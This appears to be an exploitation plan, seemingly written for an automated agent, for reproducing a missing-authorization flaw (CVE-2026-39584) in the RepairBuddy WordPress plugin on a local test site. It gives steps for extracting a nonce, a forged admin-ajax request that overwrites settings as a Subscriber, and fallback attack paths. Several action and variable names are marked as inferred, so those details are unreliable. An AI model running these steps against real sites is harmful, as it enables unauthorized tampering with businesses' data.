RepairBuddy – Repair Shop CRM & Booking Plugin for WordPress <= 4.1132 - Missing Authorization

This research plan outlines the methodology for exploiting CVE-2026-39584, a Missing Authorization vulnerability in the RepairBuddy – Repair Shop CRM & Booking Plugin.

1. Vulnerability Summary

The RepairBuddy plugin (<= 4.1132) fails to implement adequate authorization checks on its AJAX handlers. While these handlers are registered for authenticated users (wp_ajax_), they lack internal capability checks (e.g., current_user_can( 'manage_options' )). This allows any authenticated user, including those with the Subscriber role, to execute privileged actions such as modifying business settings, managing inventory, or altering customer records.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Method: POST
• Action Parameter: repairbuddy_save_business_settings (inferred) or rb_save_options (inferred).
• Authentication: Subscriber-level credentials or higher.
• Vulnerable Component: The AJAX callback function fails to verify that the user has administrative permissions before processing the update request.

3. Code Flow

1. Registration: The plugin registers AJAX hooks in the main plugin file or an admin controller:
   add_action( 'wp_ajax_repairbuddy_save_business_settings', array( $this, 'save_business_settings' ) );
2. Dispatch: admin-ajax.php receives a POST request with action=repairbuddy_save_business_settings.
3. Execution: WordPress calls the callback save_business_settings().
4. The Flaw: The callback function checks for a valid nonce but fails to perform a capability check:

   public function save_business_settings() {
       // Potential check for nonce (often bypassed or easily obtained)
       check_ajax_referer( 'repairbuddy_nonce', 'nonce' ); 
       
       // MISSING: if (!current_user_can('manage_options')) { wp_die(); }
   
       $settings = $_POST['settings'];
       update_option('repairbuddy_settings', $settings);
       wp_send_json_success();
   }
   

4. Nonce Acquisition Strategy

The plugin typically localizes a nonce for its admin interface. Since Subscribers can access wp-admin/profile.php and many plugins enqueue their global admin scripts on all admin pages, the nonce is likely retrievable from the page source of the profile page.

1. Identify Localized Variable: Look for wp_localize_script in the source code. Common identifiers in this plugin:
   • Variable Name: repairbuddy_ajax_obj (inferred) or rb_admin_vars (inferred).
   • Nonce Key: nonce or rb_nonce.
2. Creation of Page (If needed): If scripts only load on specific pages, use WP-CLI to place the [repairbuddy_booking_form] (inferred) shortcode on a public page.
3. Extraction:
   • Navigate to /wp-admin/profile.php as a Subscriber.
   • Use browser_eval:
     browser_eval("window.repairbuddy_ajax_obj?.nonce || window.rb_admin_vars?.nonce")

5. Exploitation Strategy

The goal is to modify the shop's business name to prove unauthorized data modification.

Request Details:

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Parameters:
  • action: repairbuddy_save_business_settings (inferred)
  • nonce: [EXTRACTED_NONCE]
  • business_name: HACKED_BY_SUBSCRIBER
  • business_email: attacker@example.com

Note: The exact parameter structure (e.g., whether settings are nested in an array) must be verified by the agent by checking the plugin's admin/assets/js/admin.js or equivalent.

6. Test Data Setup

1. Install Plugin: Ensure RepairBuddy <= 4.1132 is active.
2. Create Attacker User:
   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
3. Set Initial State: Configure a default business name:
   wp option update repairbuddy_settings '{"business_name":"Original Shop Name"}' (Structure inferred).

7. Expected Results

• Response: A JSON success message: {"success":true} or 1.
• Status Code: 200 OK.
• Side Effect: The plugin's business settings in the database are updated with the attacker-supplied values.

8. Verification Steps

1. Check Database via WP-CLI:
   wp option get repairbuddy_settings
2. Verify UI:
   Navigate to the plugin's settings page as an admin and confirm the "Business Name" has changed to "HACKED_BY_SUBSCRIBER".

9. Alternative Approaches

If repairbuddy_save_business_settings is not the exact action name:

1. Identify via Grep:
   grep -r "wp_ajax_" wp-content/plugins/computer-repair-shop/
2. Target Inventory/Items:
   Look for actions like repairbuddy_add_item or repairbuddy_delete_customer.
3. Check for Nonce-less Actions:
   Some older versions of this plugin may have forgotten check_ajax_referer entirely on specific handlers, making them exploitable even without a nonce.
4. Check for Settings API:
   If the plugin uses register_setting, try sending a POST to wp-admin/options.php using the Subscriber session to see if the option group is unprotected.